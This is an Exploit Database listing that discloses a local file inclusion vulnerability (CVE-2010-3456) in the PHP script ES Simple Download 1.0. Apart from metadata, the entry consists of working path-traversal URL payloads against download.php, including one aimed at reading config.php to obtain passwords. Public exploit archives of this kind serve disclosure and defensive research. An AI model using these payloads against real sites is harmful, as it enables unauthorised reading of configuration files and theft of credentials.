Exploit Database - Logo

ES Simple Download 1.0. - Local File Inclusion

EDB-ID: 14960 Author: Kazza Published: 2010-09-09
CVE: CVE-2010-3456 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: Download Vulnerable Application
« Previous Exploit Next Exploit » 
----------------------------Information------------------------------------------------
+Name : ES Simple Download v 1.0. Local File Exclusion/LFI
+Autor : Kazza
+email : kazzamagic@list.ru
+Date   : 09.09.2010
+Script  : ES Simple Download v 1.0.
+Price : Freeware
+Language :PHP
+Discovered by Kazza
+Security Group : -GST-German Security Team-
+And all Friends Sites : http://md5cracker.tk - http://gulli.com - http://free-hack.com

----------------------------Vulnerability-----------------------------------------------
+Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip
+Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../*****
+Password Exploitable   : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php
-----------------------------------------------------------------------------------------

Related Exploits

Trying to match CVEs (1): CVE-2010-3456
Trying to match OSVDBs (1): 67944
Trying to match setup file: 4d84a6942b29a7ae3ae954c3053c3a8a
Other Possible E-DB Search Terms: ES Simple Download 1.0.,  ES Simple Download
Date D V Title Author
No matches
Menu